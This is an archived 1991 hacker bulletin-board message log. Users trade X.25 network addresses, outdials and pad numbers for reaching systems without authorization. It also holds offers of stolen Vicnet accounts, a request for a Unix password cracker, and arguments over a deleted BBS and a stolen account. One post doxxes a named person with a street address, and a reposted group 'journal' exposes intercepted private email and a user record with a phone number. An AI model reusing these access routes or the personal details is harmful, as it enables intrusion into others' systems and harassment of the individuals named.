but if they are acting like children treat them like children man. They will go away when they sense they are wasting their own time and ours. Dr. Dissector glad to see you back. I heard you came down to SD in the summer? I heard it from Tak/Scan so i didn't take it as anything to true. haha ========================= Message 161 From galileo at 03:47:03 on Thu Jul 18 Subject: anarchists Ok, I am not in any way supporting these people who don't do anything but annoy everyone. I understand ronnie's situation and feel very sympathetic. What I was trying to say, is that "anarchists", as far as I am aware, advocate freedom and respect for everybody's else freedom too. This is the opposite this people are doing. I feel calling them anarchists does not suit them at all. How about ... D I C K H E A D S ? ? Gali ========================= Message 162 From infinity at 03:51:44 on Thu Jul 18 Subject: internet someone explain how to get here through internet<terminus>. Infinity ========================= Message 163 From ronnie at 06:36:49 on Thu Jul 18 Subject: hmm about the nonly way you could get on here through internet is to find a site that is also hooked to an x.25 server, etc.. and go on from there it could be a unix/vms/server or anything. but there is no direct inet address that i know of.. ========================= Message 164 From orpheus at 13:56:30 on Thu Jul 18 Subject: bbs Ok whose the asshole(s) who erased my bbs on lina. well they only really erased the data file that had all the accounts/mail/posts but that doesnt make any diffrence. I'D wish you stupid assholes would fuckin grow up . im trying to provide a SERVICE here and all you can do is destroy it? WHaat the fuck is every ones problem. im sick of your shit why dont you reveal yourself you stupid pussy so i can send you a little gift in the mail. The SysOp of lina had an account on there and he's not gonna be too happy when he learns a guest deleted everything. nether will the 20 users who had accounts there. ========================= Message 165 From gauloise at 15:53:46 on Thu Jul 18 Subject: LINA BBS Tanks a lot guys, by killing Orph's BBS on Lina you erased some Information that was very valuable for me. ! FUCK YOU VERY MUCH !!! #1 really has got to be elite to do that ! I wonder if it was COMSEC ?? ___ / \__\ auloise ========================= Message 166 From netmuffi at 18:13:17 on Thu Jul 18 Subject: NUAs Hello everyone I've got some outdials, if you want one. Please send me a short mail. Bye ========================= Message 167 From cyclopz at 19:00:56 on Thu Jul 18 Subject: Deletionm Try This, WHo is the ELITE HACKBASE TERRORSIT? Onc eyou find out who That Is, Youve gppt Your Deleter Orph (Try CoH) das who did it, Yup! Latez...CyClopz! ========================= Message 168 From infinity at 19:56:24 on Thu Jul 18 Subject: idea Hell Rad Fucking Hackers H. R. F. H. \|>etails The group is based on the fact that "Hackers" or so they are called are not as "Elite" or "Lame" as people label some to be. The group is to be a base of learning where all hackers/phreakers share ideas about the hacking scene as well as share information about the networks. By doing this, We, the Hackers/Phreakers of the United States and team up and learn just as most our sworn enemies have. Do you think the Telco workers put each other down and call the other childish names? No. Do you think the U.S. Government (FBI) put each other down? No. They work as a TEAM! The H/P scene is working against it's own growth by putting people who might not know as much as the other down just because of their lack of knowledge. I must say that to be "Elite" as it is put is to be Ominpotent and no one except for God is that. In my mind we are basically all the same so why not just act the same instead of different. If the H/P scene would work together instead of apart we might acomplish more. I am talking about the union of all groups and so on to join as one and to act and think as one. United we stand, Divided We Fall. If we all work together we can acomplish much more adn learn much faster than any individual can. The body for instance is not one it is many combined as one. If you look into anything it has parts, even the atom has parts. Parts are a continueum of infinite proportions and taking advantage of this can definetly help graciously the H/P scene. Here is a sample situation of what might occur if the idea i am projecting right now would be in force. Sample Situation: Hacker #1: Hey Hacker#2, Hacker #3 got busted yesturday. Hacker #2: By who? Hacker #1: Tymnet! Hacker #2: How do you know this? Hacker #1: Because he lives near me and i saw the whole thing! Hacker #2: Shit, that sucks, well, hey i am going to start telling everyone what has happened. I'll just pass around on the boards. Hacker #1: Ok, Later dude. Hacker #2: Later. <Click> Now here is an example of the same situation under t he terms now. Hacker #1: Hey Hacker #2, Hacker #3 got busted yesturday. Hacker #2: By who? Hacker #1: Tymnet! Hacker #2: How do you know this? Hacker #1: Because he lives near me and i saw the whole thing! Hacker #2: Shit, that sucks, well, fuck him he was lame anyway! Hacker #1: Yeah, but he was cool sometimes. Hacker #2: Yeah, oh well shit happens. Hacker #1: True. Well, I am staying away from tymnet. Hacker #2: Me too. Everyone else can just get busted! Hacker #1: Yeah.... hehehehe. Me and you won't! hahaha Hacker #2: Yeah... hahahah Hacker #1: Talk to you later. Hacker #2: Yeah, Later. <Click> This kinda of selfish attitude doesn't cut it in the real world and will eventually grow extinct just like the Blue Boxers did! Well, That's my idea so if you agree post some msgs which display your points about the idea and how you feel about it. Later... Infinity ========================= Message 171 From spirit at 21:46:36 on Thu Jul 18 Subject: Terrorists I think I have to bring up an old argument and say that perhaps "terrorist" is too respectful for this individual. Terrorists all have a goal, or at least a cause for doing what they do. I think 'vandal', 'rapist', or 'molester' would suit the fellow just fine. As for his identity, Gaul, COMSEC is certainly not responsible for this. Like them or not, they are a legit imate company, and they do not break into foreign systems (against the admin's will, even) and destroy data. Saying that CoH is responsible also seems incorrect to me. I do not know CoH, but he just doesn't seem to fit with those people I see as responsible for this. Well first the 'hackbase' got waxed and now it's Orpheus's BBS? I do not know much about VMS, but shouldn't it offer some means of restricting permissions to the BBS data except through the BBS itself? I know in unix this would easily be solved with a setuid bit set on a secure interface (the BBS), and proper modes/ownership on the files. Oh well, I think you can see now why hackers are seen as 'Computer Thugs', look who we have to represent us. So. ========================= Message 172 From heartz at 04:26:49 on Fri Jul 19 Subject: Hold on a) why put a bbs on lina? because it will just get nuked in any case, why not put it on another damned vax? b) if you have another account other than guest, upload the files under that account, that way only they owner of the account or system can delete it, I don't see the problem. h. ========================= Message 173 From ronnie at 04:57:27 on Fri Jul 19 Subject: Wing ------------------------------ Date: July 8, 1991 From: Barbara E. McMullen & John F. McMullen Subject: Secret Service Pays Hacker Call (Reprint from Newsbytes) SECRET SERVICE PAYS HACKER CALL 07/08/91 NEW YORK, NEW YORK U.S.A., 1991 JULY 8 (NB) -- According to a Pennsylvania teenage "hacker" known as "Wing", agents of the United States Secret Service visited his home and that of some friends asking questions about rumors they had allegedly received about the planting of "July 4th logic bombs". Wing told Newsbytes that the agents arrived at his home and requested to talk to him about "rumors that he had planted logic bombs or viruses to go off on the 4th of July." Wing said that, on the advise of his father, he refused to discuss the matter with the agents, "The last time that the Secret Service was here my father told them not to come back again without a warrant so, when they did, I didn't talk to them. The whole thing is ridiculous anyhow. There was obviously no July 4th bombs and I certainly didn't plant any." Wing also said that agents visited friends of his and "made one who is new to computers feel that he was doing something wrong by trying to log onto bulletin boards." A Secret Service official, speaking to Newsbytes, confirmed that agents had attempted to interview Wing in relation to rumors of a July 4th attack on computer systems. The official also said that, because of Wing's juneville status, his parents have the right to deny the agents' request for an interview. The agent further said that, to his knowledge, there were no cases of computer attack on the 4th of July. Other law enforcement officials had told Newsbytes, previous to the July 4th holiday, that they had received rumors of such a planned attack but that they had little substantive material upon which to base an investigation. There have also been recent reports to Newsbytes from sysops of university and foundation computer systems in the Boston, MA area of attempted unauthorized access by an individual purporting to be Wing. ------------------------------ . . ========================= Message 174 From faust at 19:43:02 on Fri Jul 19 Subject: LINA bbs... Well I'd imagine that the sysop of LINA would be more tolerant of a bbs than the average sysadmin of a hacked vax.. So I guess it'll get nuked only if some stupid user keeps doing it, so if you can protect it better, I'd say go for it.. Even if you have an account other than guest, the bbs user still has to have write permission on some of the files ( to enter messgaes and stuff), so you really can't protect that since there's no suid on vms.. You can't even hide stuff under an unreadable directory, since in vms's screwed up security, you won't be able to access anything under that directory tree.. Probably the best way would be to ask the sysop for a captive acct to run the bbs with and just contain the bbs user within the bbs.. [N]ext, [ R]eply, [A]bort? Message 175 From tchhacky at 21:20:20 on Fri Jul 19 Subject: Howdy Does anybody know how to use an x28 pad that has a command'dial sra'? thanks. ========================= Message 176 From heartz at 21:31:13 on Fri Jul 19 Subject: Well to faust: of course it would have to be a captive account, or someone will just drop to DCL and nuke it, since it's V5.4, there shouldn't be a problem. h. ========================= Message 177 From faust at 06:59:49 on Sat Jul 20 Subject: hmm So it is possible to drop to shell before 5.4? How? ========================= Message 178 From heartz at 16:56:22 on Sun Jul 21 Subject: forget it. I don't think that should be discussed here. for that matter, at all. h. ========================= Message 179 From faust at 20:56:36 on Sun Jul 21 Subject: ??? Why not? Is it super-sensitive info or something?? Obviously I'm assuming that the bbs (or whatever other login script) has traps for ctrl-y, ctrl-z, etc. If there is some way around a properly set up script, I'd like to know the general idea about it. Don't discuss it if you don't want to though heartz.. nobody's making you do anything. ========================= Message 180 From ronnie at 21:01:45 on Sun Jul 21 Subject: well . . . Isnt the fact that this is a base for hackers to share information anything at all anymore. I mean seriously. If you dont want to share the information you get, then you shouldntt talk about it Wow! it's real big to say `I can do this and i can do that' but the object is that you learn to do it for your own satisfaction, then it is selfish. But then, if you are doing it for the good of others, and trying to help epople out.. that is what this is all about. I'm not bitching at you heartz.. i'm just saying.. If you want to be selfish, then why should you(not you personally) c ome on here and flaunt what you can do, etc.. kinda sounds like something MOD would do.. I have nothering against anyone.. but i think the Free Distribution of infomration sohould be just that.. free.. lateron ronnie ========================= Message 181 From hstreet at 00:32:30 on Mon Jul 22 Subject: heh 1)heartz is a lonely paranoid nerd who is a hypocrite 2)He really doesnt know it himself..he only heard that it is possible ========================= Message 183 From hstreet at 17:04:43 on Mon Jul 22 Subject: i like to write but then again some bite! please i am looking for a pen pal write to me at: carol a linde 1819 S CHEROKEE LN LODI , CA 95240 area code (209) ========================= Message 184 From orpheus at 18:53:55 on Mon Jul 22 Subject: uh oh uh i just reaalized whose address that is. thatz n0t very nice! .s ========================= Message 185 From ronnie at 00:08:32 on Tue Jul 23 Subject: hmmm hahahhahahha.. well.. i dont pass out info.. but oh well.. some people have thei r ideals.. ========================= Message 186 From tchhacky at 01:42:25 on Tue Jul 23 Subject: phuck that is the phuckn funniest thing I think I have ever seen, putting someone's ad dress on a bbs. Thanks for the laugh hstreet ========================= Message 187 From cyclopz at 11:21:18 on Tue Jul 23 Subject: Pads Blammo i dont care how much you love usin a god to goto a pad its fuckin SLOW and it sucks......But at least it werks... Later..CyClopz!...The Perturbed ========================= Message 188 From galileo at 18:20:30 on Tue Jul 23 Subject: hstreet / address I dunno who's address that is I dunno who wrote that message I dunno who the account was stolen from But this is what I think: Whoever wrote those two messages (that and the one to Heartz) Is the lowest of the scummiest motherfucka and should feel sorry for itself. ('cause I certainly don't). ========================= Message 189 From ronnie at 20:08:08 on Tue Jul 23 Subject: welll..... i know hstreet wouldnt do that for one thing so i'm not worried about that at all.. but i am worried about whoever did it.. blah later ronnie \| no mental disorder like some people have ========================= Message 190 From blammo at 23:52:05 on Tue Jul 23 Subject: cylopz.. i don't like using outdials to call overseas to get here..but at least it's better than using some shitty NUI like dynapac (i know it's dead, just an example). if i had a local telenet # i wouldn't have this problem..oh well. btw, for those who haven't noticed trtsvc is passworded. ========================= Message 191 From cyclopz at 13:58:27 on Wed Jul 24 Subject: Trt Yeah same prob here blammo no local Telenet.. and guess what trt isnt pw'd anymorew,... Later ========================= Message 192 From blammo at 20:09:27 on Wed Jul 24 Subject: trt out of the kindness of my heart, here's a pad that trtsvc calls which seems to call anywhere (including lutz): 487220390 i'm such a nice guy. ========================= Message 193 From tchhacky at 21:35:31 on Wed Jul 24 Subject: gs/1's I swear to god man that everytime I try to use a gs/1 it never frigin works. Do any of you guys have any documents on gs/1's or anything you guys have to say on them cause I am pissed off Thankyouverymuch ========================= Message 194 From ronnie at 21:40:59 on Wed Jul 24 Subject: hmm gs/1 i'm also looking for any info on gs/1's.. blah.. i got all kinds of them all over the palce and i dont know how they work! blah lateron ronnie ========================= Message 195 From orpheus at 22:01:54 on Wed Jul 24 Subject: gs/1 well theres a file er 2 floatin around bout gs/1 like dr dissectorz . i only have printed copies and none on magnetic media so i cant help ya unless u want me to retype the whole file. (which i wuldnt dream of doing) so just ask sum1 cuz lotzaa ppl have it ========================= Message 196 From blammo at 22:07:49 on Wed Jul 24 Subject: gs/1z well, the only 2 GS/1 pads i ever tried to use used the format: c !128#026245400080177 i think the 128 part is what varies between pads though..it's like the port or something (i guess). i'm not entirely sure, but that's the only working method i know of. ========================= Message 199 From orpheus at 07:07:24 on Thu Jul 25 Subject: gs/1 yeah . thats the port #. u type SHOW ADDR and look fer the port #. its the # after the !. then when u tri 2 pad out use a port # 1 above or below the port u saw in sh address ========================= Message 207 From machine at 12:19:22 on Thu Aug 1 Subject: Call.. IMX/2 -> 23224179036 nice chat/mailbox system in Austria. - Machine - ========================= Message 208 From gazr at 00:27:21 on Sat Aug 3 Subject: theft Okay guys, I think I should tell you that Paradox has stolen my account. Like a dick, I trusted him with it, and he has now changed the password so he can do what he likes with it. So, if you get any shit from someone called 'doctord', you'll know it's him. The fucking LAMER ! The real Doctor Devious ========================= Message 208 From gazr at 00:27:21 on Sat Aug 3 Subject: theft Okay guys, I think I should te X?+4]tat Paradox has stolen my account. Like a dick, I trusted him with it, and he has now changed the password so he can do what he likes with it. So, if you get any shit from someone called 'doctord', you'll know it's him. The fucking LAMER ! The real Doctor Devious ========================= Message 209 From spirit at 06:10:09 on Sat Aug 3 Subject: Mmm Wasn't the real paradox! So. ========================= Message 210 From blammo at 07:48:02 on Sat Aug 3 Subject: blah harumph, even. that's what i say. too much account thieving going on around here... just goes to show you shouldn't trust people with yer account. and you shouldn't use tymnet. ========================= Message 211 From cloud at 10:13:21 on Sat Aug 3 Subject: theft I guess the moral of that story is: NEVER trust ANYONE with ANY account of yours on ANY system ========================= Message 213 From spirit at 17:24:23 on Sat Aug 3 Subject: ... Or just don't use Tymnet!!! So. ========================= Message 214 From galileo at 17:25:37 on Sat Aug 3 Subject: doctord theft Doctor Devious should have never given out the password to his account. What a silly thing to do! But people learn from mistakes. However, Doc Dissector, I know you like the account because of your name, but I really think it would be pretty decent of you to give it back. You are respected bay many (including me) for your fine Killer Cracker efforts. I think your image would be strengthened if you gave rthe account back. ========================= Message 217 From private at 09:10:09 on Thu Aug 8 Subject: bhahaha actuallyy, i have nothing to dowit tht eh accund theft... blah.sp... and i have no usre for spare or extra accounts on lutzifer, so i reallyy don't know what everyone is talking about... er... yeah pardox is mod ro something, but who cares now nayway... neway... id d not steal the acct... i've been doin' other things... ehehe.. doc. dissector... not doctor devious or anyone else for that matter ========================= Message 218 From machine at 10:44:54 on Thu Aug 8 Subject: PEGASUS 228475212574 (it's a NUA) - Machine - ========================= Message 219 From orpheus at 21:03:49 on Sat Aug 10 Subject: u-con bbs U-Con BBS - underground connection on node lina 22222800173 use GUEST account and typwe this simple command after login run [guest.dragon]bbs if you have your own acct on lina, just mail me here telllin me whut your uswrer name on lina is so i can add u to the access control lisy bbs has 5 message bases, and mail. no lamers please ========================= Message 220 From orpheus at 09:30:11 on Sun Aug 11 Subject: bbs if u called bbs b4 and got error msg, i was werking on it. its fixed so ucan kall it now ========================= Message 221 From cythief at 04:01:22 on Thu Aug 15 Subject: Internet yo does anyone have any NUA's with full Internet access (not merit x25s) oops...as I said , none with x25s (like merit)..or a nuas to a unix or something shit I fuckin hate this no word-wrap shit...anywyz on a unix or something that is on the internet ...please mail it to me at biox cythief later, Count_ZER0/LoL/IHA Message 222 From anthrax at 08:06:40 on Thu Aug 15 Subject: Internet try 505236023008 It is the nua for Vicnet at RMIT in Australia. At the which service? prompt, you can enter a range of requests, such as ccannex csannex, cdcnet, wmensa, godzila, and some more. From these servers you have access to a huge number of unix's and acouple of vaxes. Hope that helps. If you need some accts then just mail me. Anthrax ========================= Message 223 From cythief at 00:49:59 on Fri Aug 16 Subject: Internet again that nua (in msg #222 ..I think!) worx and stuff but it always gives me a time-out when I try to reach spies.spies.com or anyother internet address in the U.S....the system I use is ththe ccannex one, and from there I type telnet and then its like anyother unix or whatever..well, tell me other ways or if U figure anything out with it...thanx a lot for all your help later daze, Count_ZER0/LoL/IHA ========================= Message 224 From anthrax at 16:02:28 on Fri Aug 16 Subject: Internet once again.. Well, you will most certainly need to get an account on one of the systems accessible from the annexes. I have accounts I can give you, from cdcnet and from ccannex , if you like. A few months back, I used to be able to connect to WMENSA, and from here enter connect <ip>, and it would connect me regardless. However due to some abuse they have stopped this route of access grin. Anyway, to get some valid accts from the annes, use the who @ command, i.e. just like the finger command. If you need any more help with Vicnet, just ask. ANTHRAX ========================= Message 225 From tango at 18:57:46 on Sat Aug 17 Subject: help? hiya..! ey..can u give me any account for a unix ? is for use the ftp command..i need some files. so i need it download.... if u can give me an account i will appreciate too much. thnaks ========================= Message 227 From getafix at 00:23:52 on Mon Aug 19 Subject: Internet > Janet Duhh, is there a way once you're on Internet to connect up to a JANET pad or any JANET site? Enquiring minds would like to know! ta muchly, catchya laters potatas ========================= Message 228 From mayhem at 15:22:28 on Mon Aug 19 Subject: USSR ``In view of Mikhail Gorbachev's inability to perform the duties of the federal president and the transfer of federal presidential powers, in keeping with paragraph 7, article 127, of the USSR Constitution, to Vice President Gennady Yanayev, ``With the aim of overcoming the profound and comprehensive crisis, political, ethnic and civil strife, chaos and anarchy that threaten the lives and security of the Soviet Union's citizens and its sovereignty, territorial integrity, freedom and independence, ``Proceeding from the results of the popular referendum on the preservation of the Union of Soviet Socialist Republics, ``And guided by the vital interests of all ethnic groups in the country and all Soviet people, ``The Soviet leadership resolves: ``First, in accordance with paragraph 3, article 127, of the U.S.S.R. Constitution and article 2 of the U.S.S.R. law on state of emergency regulations and with demands by broad popular masses to adopt the most decisive measures to prevent society from sliding into national catastrophe and ensure law and order, to impose a state of emergency in some parts of the Soviet Union for six months from 04:00 Moscow time on August 19, 1991. Secondly, to establish that the federal constitution and laws have unconditional priority throughout the territory of the U.S.S.R. Thirdly, to form a state committee for the state of emergency in order to run the country and effectively exercise the state of emergency regime, consisting of: O.D. Baklanov, first deputy chairman of the U.S.S.R. defense council. V.A. Kryuchkov, chairman of the KGB. V.S. Pavlov, prime minister of the U.S.S.R. B.K. Pugo, interior minister of the U.S.S.R. V.A. Starodubtsev, chairman of the farmers' union of the U.S.S.R. A.I. Tizyakov, president of the association of state enterprises and industrial, construction, transport and communications facilities of the U.S.S.R. D.T. Yazov, defense minister of the U.S.S.R. G.I. Yanayev, acting president of the U.S.S.R. Fourthly, to establish that the state committee for the state of emergency's decisions are mandatory for unswerving fulfilment by all agencies of power and administration, officials and citizens throughout the territory of the U.S.S.R. The statement was signed by Yanayev, Pavlov and Baklanov. ========================= Message 229 From scott at 19:20:57 on Mon Aug 19 Subject: Sports Net If anyone could help me find out how to log on to Sports Net i would be very muc h appreciative. will trade any thing for it. you can log on through, telenet, co mpuserve, or wats. just need an account. ========================= Message 230 From heartz at 02:21:50 on Wed Aug 21 Subject: scott? do you mean the USA Today Sports Center? h. ========================= Message 231 From lethal at 03:27:02 on Wed Aug 21 Subject: phrack hmmm don't have the address to phrack.. but if you call the states for free you canreach a few BBS's and d-load them.. will try to get the address for ya though..later ========================= Message 232 From mayhem at 13:25:02 on Wed Aug 21 Subject: Phrack FTP FTP PHRACKS and a shitload of others at: chsun1.uchicago.edu /pub/Text.Phracks/ ========================= Message 233 From midas at 14:40:07 on Wed Aug 21 Subject: WHY WHY WHY ? Why give out the Vicnet nua here? That has systems on it that are VITAL to Australian hackers, which will collapse with international weight. Sharing of info is one thing, but ridiculous invitations to the entire hack worl d are another. midas. ========================= Message 234 From blammo at 22:38:17 on Wed Aug 21 Subject: vicnet sounds to me like you're just afraid you won't stand out in the international hacking community as well as you stand out in the australian hacking community..which i can relate to...i'd hate it if someone started hacking a network that i considered myself one of the most knowledgable people about...but what you have to do is make sure you'll STILL be one of the best, even with the extra weight of international hackers..that's where the incentive is. since international hackers probably know much less about vicnet than you, you've already got a head start. think of it this way- vicnet could become an incredibly popular place to hack, (popular place to hack..<got line noise>)..and you could be the best vicnet hacker, if you 'play your cards right' (so to speak)..it's a great opportunity. so tell people how to access the network, and take the challenge for your own benefit. ^the ramblings of a tripping midnite. ========================= Message 235 From me at 00:44:58 on Thu Aug 22 Subject: Hackbase in my defence id like to make clear that i did not crash hackbase or Orpheus' vax.. i dont even understand the jibberish that Cyclopz started, but it wasnt neccessary.. Anyway about the Question if when you are on Internet can you reach a JANET site or pad..well i believe so since i am on an internet address taht is also a Janet site or reached by a Janet (NUA). Well, I invite you all to my bbs. Leave me mail for the #.. thanks me=Code Of Honor ========================= Message 236 From lethal at 03:07:47 on Thu Aug 22 Subject: Janet Well to get to Janet off internet, you telnet to sun.nsfnet-relay.ac.uk, and at the log on promt type janet, and bam, you is on a janet pad... LEthal /s ========================= Message 237 From me at 04:40:49 on Thu Aug 22 Subject: MOD This is NOT Code Of Honor. Just thought everyone would find this intresting. I was only able to get part of the file, but it gets the point across. ============= + + * NASTY JOURNAL #2 * + + ============= During the past few months NASTY has taken a small vaction. During that time MOD has bragged about 'crushing NASTY with my thumb'. Well it just got to unbearable. It's time for us to show the little shits for what they really are. Oh by the way MOD: An individual wishing to remain anonymous wishes to say 'Corrupt, the angry man wishes to say MOD fucks dogs.' Well, let me start of by recapping the situation. MOD claims to be so dam untouchable. They also claim WINGNET and their UNIX are so dam secure. hehe what a joke. During the time NASTY has been 'crushed', we have been monitoring WINGNET! All of the mail, files, password files, messages, and lovers quarrels have been intercepted. YES we OWN MOD! This file is only the first of several! By the way, the angry man says that the telenet database is pretty impresive even for a bunch of losers! EVERYTHING, I mean EVERYTHING is going to be made public. Including but not limited to MOD's 'PRIVATE' database! During the course of several weeks we at NASTY will be studying MOD in depth! Now the public can know everything that MOD knows. (Isn't that great? woopy!) ============================================================================ From NEW USER ACCOUNT CREATOR Thu Aug 24 00:29:01 1995 LOGIN NAME: avatar USER ID: 2004 GROUP ID: 100 GECOS: THE AVATAR HOME: /pub/avatar SHELL: /bin/notvalidated PHONE #: 785-4544 From uucp Tue Jul 30 03:07 EDT 1991 >From uunet!eff.org!knight Tue Jul 30 03:07:06 1991 remote from cosi Received: by modnet.UUCP (smail2.5) id AA06323; 30 Jul 91 03:07:06 EDT (Tue) Received: by cosi.UUCP (smail2.3) id AA00467; 29 Jul 91 23:51:16 EDT (Mon) Received: fr om eff.org by relay2.UU.NET with SMTP (5.61/UUNET-internet-primary) id AA26798; Mon, 29 Jul 91 23:44:02 -0400 Received: by eff.org (5.61+++/Spike-2.0) id AA20540; Mon, 29 Jul 91 23:43:42 -0400 Date: Mon, 29 Jul 91 23:43:42 -0400 From: uunet!eff.org!knight (Craig Neidorf) Message-Id: <[email protected]> To: modnet!root Subject: Cancelled It was cancelled because of the economic summit. Who in MOD is this? kl cont. ========================= Message 238 From deth at 09:43:13 on Thu Aug 22 Subject: more! hey how boutz gettin the rest of that file ups here? ========================= Message 239 From lethal at 11:27:30 on Thu Aug 22 Subject: hats off hey, you said a mouthful...but everything youstated is true. Our societ is stagnating and it is oppressed. People really don't have a voice anymore, or they are just getting too soft and/or lazy to use their voices ..hmmm I think they would rather leave the speaking and decision making up to the fucking lame schmucks who lobby for all the bullshit laws that are being passed all the time. Hackers need to be educated in all the aspects but of course it is getting to the point where they can't...why?? Because they cannot get on any of the BBS's where they could learn and get educat d in all ways of H/P because of the lengthy info forms, voting, NUP's etc that they have to know before getting an account..so fuck it anyway... Hackers are destroying hackers as time goes on...if all these "elite" fags would take the time out to educate all the potential hackers out there, and guide them towards some kind of goal..then there would be a force to be reckoned with....but this probably wont happen... fuck it let's have some good ol' fashioned Anarchy for a change.. ========================= Message 240 From scott at 17:08:14 on Thu Aug 22 Subject: sportsnet no it is off of coinet net on telenet, it is c 20366. and the accounts are like tx249, and the pw i have no idea about. any help? from what i hear, the system is neat. alsop what is this usa today, do yo ] they have something to do with sport cards? ========================= Message 241 From scott at 17:10:41 on Thu Aug 22 Subject: the same this may sound stupid, but how do you get to internet and shit from tymnet, i know nothing about internet, i would like to be able to get to shit like edu.phrack. etc... thanks.\ ========================= Message 243 From blammo at 03:15:11 on Fri Aug 23 Subject: scott-internet well, i don't know of any direct x25-tcp/ip connections, unless that kometh telepac gateway (22847911065) actually works..but, you can call 311061700313 (pcp od) and d 2587111 for terminus...which allows almost unlimited internet access as far as sites go, but has limited usage. otherwise, find another od and call one of the many other internet servers that i don't know offhand. ========================= Message 244 From fear at 05:03:58 on Fri Aug 23 Subject: amazing So MOD is outdone by another group of egotistical power tripping fuckers who will exploit other hackers for personal fame & ego food? Now this is fucking progress. -Fearful ========================= Message 245 From cyclopz at 06:03:19 on Fri Aug 23 Subject: Amaizing!!! So You've Noticed taht hmm? aint Life grand... As for terminus..IT SUX DICK...half the time iT Locks what ya want ta telnet too./.. Instead Try FOGNET SFSU 415-338-2400...Dont know the Od... Muchas Better.. CyClopz!... ========================= Message 246 From me at 06:04:39 on Fri Aug 23 Subject: NASTY We at NASTY are not exploiting other hackers for fame. Hell I really couldn't care less if NASTY was well know. In fact I would prefer to stay out of the publics eye as much as possible. At the time that that file was released we were (I was) having a few problems with MOD, well well, they have cleared up, so that file will be the last. ========================= Message 247 From me at 06:57:25 on Fri Aug 23 Subject: bbs' well id like to state that my bbs, has #1. No infoforms #2. No New User Password #3. Is a place for education. or was a while ago, and hopefully again. asl well id like to state that those messages about MOD were from Renegade Hacker he uses this account also.. well i just dont want to be on MODs bad side.. because thats all i dont need now.. but im saying i actually support them.. but id rather stay even.. ========================= Message 248 From me at 07:02:10 on Fri Aug 23 Subject: Hmm Well, as for NASTY and you, please write me@renegade hacker after your messages because i dont want to get people confused., or ill just keep my account me@Code-of-Honor leave mail for my bbs # ========================= Message 251 From me at 01:36:37 on Sat Aug 24 Subject: NASTY NASTY's mailing address is: renegade@hale.uucp (I screwed up the last time) ========================= Message 252 From me at 20:32:58 on Sat Aug 24 Subject: NASTY We need articles for NASTY Journal release 3, it is half way finished. Anyone wanting to write an article or has one that they wish to contribute, please mail it to 'me' on Lutzifers, or send it to: 'renegade@hale.UUCP' (Or mail it to me on Bellcore Exchange, Code Of Honors system). ========================= Message 253 From kaleidox at 01:59:09 on Sun Aug 25 Subject: gs/1 Does anyone have anything detailed about the gs/1 data servers? They look canned..can they be used to connect to systems outside their own net? Oh, does anyone happen to have the Pope's fone number? A friend of mine is looking for anything inside the Vatican..the closer to His Holiness the better. ========================= Message 254 From lethal at 04:03:11 on Sun Aug 25 Subject: GS/1 Dr. Dissector wrote a damn good file on GS/1...Look it up on yer local h/p board . GS/1 at 311042200106 ========================= Message 255 From me at 08:19:52 on Mon Aug 26 Subject: NASTYJ03 The NASTY JOURNAL RELEASE 3 is complete and ready for distribution. If you want a copy sent to you let me know at what address. (Or your user name o n her user name on here.) ========================= Message 256 From jello at 08:34:19 on Mon Aug 26 Subject: "NASTY" What the hell, that clipping of the "nasty" journal promised releases of MOD secret files and shit. But now that their problems are resolved, they are gonna bail out on all that shit. I have one thing to say, WHAT A FUCKING GROUP OF PUSSYS!! MoB Would have never done something that un-elight as to make promises and bail out on them. Looks like a need for a second coming. ========================= Message 257 From midas at 10:24:13 on Mon Aug 26 Subject: UNIX PASSWORD CRACKER Gday all. It is of particular importance for me to crack a number of unix passwords. Does anyone out thre have the type of program that encrypts possible pwords and compares them with the pword file? I am quite DESPERATE. Any assistence areciated. (appreciated) Midas. q ========================= Message 258 From midas at 10:32:25 on Mon Aug 26 Subject: slightly misdirected logic Being the 'best' is of no interest to me. Vicnet security would surely increase a thousand fold, making it useless to EVERYONE. There is nothing special about the vicnet network.. Its just that its convenient. Sharing is one thing. There are limits, however. Sharing to such a huge degree will mean no gain for anyone, but a loss for a few. Midas. ========================= Message 259 From me at 17:39:09 on Mon Aug 26 Subject: MOD/NASTY Whatever you say guy. We are not bailing out, we just resolved our differences and proved the point we wanted to prove. Besides, why are you so eager to get the rest? Are you some kind of mega leach? A NARC, and you were hoping to get a fat bonus? Anyway, MOB? I just heard about it. from what I hear it's pretty lame. So why don't you enlighten us! The only reason we released it in the first place was to piss them off and prove that MOD was 'touchable', now that we have proved it it has served our purpose. Not to mention, the whole file was never put up here. ========================= Message 260 From lutz at 23:40:25 on Mon Aug 26 Subject: account-proceedings Hi all pls read the update for account-proceedings by requesting help on creating accounts from within minish. Thanx, Lutz ========================= Message 261 From spirit at 03:06:57 on Tue Aug 27 Subject: new account-proceesings ANyone have any idea whatever of what lutz is trying to accomplish with the 'new' acct-proceedings? I don't see the logic. Oh well, I guess when you own the system you get to run it like ya want. byebye lutz So. ========================= Message 263 From freebird at 21:49:02 on Tue Aug 27 Subject: new accts I think it's a shame that most existing accts will be terminated by Oct 1st. One of the things that I've most liked about lutz as opposed to QSD and some other chats, is that ppl are identifiable for the most part by their accts. On QSD, you never really know who ur talkin to, and I guess that's the way that lutz will be after Oct 1st, since I can't see any realistic way that anyone will be mailing lutz their real name / address given the dodgy methods that almost all of us use to get here. I don't understand what the problem is with the accounts the way they are now since most ppl seem to be pretty happy the way things are? Maybe what we need is a vote, but then, this is Germany :) I can understand the need for validating new accts, but if an existing acct is not causing any trouble with the system, then is there any particular reason why it should be deleted? And what purpose would it serve to require our names and addresses to be registered with the system? I don't see how this would improve things for the users on the system, or for anyone else for that matter. After Oct 1st, there will be very few remaining accts on Lutz. Seems a pity. ========================= Message 264 From scott at 23:16:31 on Tue Aug 27 Subject: ? send one to scott. on here. thanks. sss ========================= Message 265 From me at 00:14:14 on Wed Aug 28 Subject: XBBS/Parisite Im looking for a Unix BBS preferably Parisite which i hear hides it self on unix, but if xbbs hides itself then that would be good to.. or even if it doesnt.. so either mail me the source. or more preferably send it to my bbs. (mail me for the #) ill think of something to give in return. me@Code Of Honor! ========================= Message 266 From orpheus at 06:23:11 on Wed Aug 28 Subject: bomb threat guide thiz file i found might be interesting to aanarchists, it tells sys operators to do if they get a bomb threat SYS$SYSDEVICE:[CGI.ORDB22.E5.TEXT]BOMB.DOC;1 ******** OPERATOR INSTRUCTIONS FOR BOMB THREATS ****************** 1) Remain calm. It is very important you gather as much information as possible from the caller. 2) What is your name? 3) Where is the bomb? What is the address? What floor? What office? What does it look like? 4) When is the bomb set to go off? 5) How do you know so much about this? 6) Do you realize innocent people might be killed? 7) May I connect you with the police? 8) Caller characteristics. Please note as much about the caller as possible: A) Accent B) Tone of voice C) Seemed drunk or D) Read a statement (text of 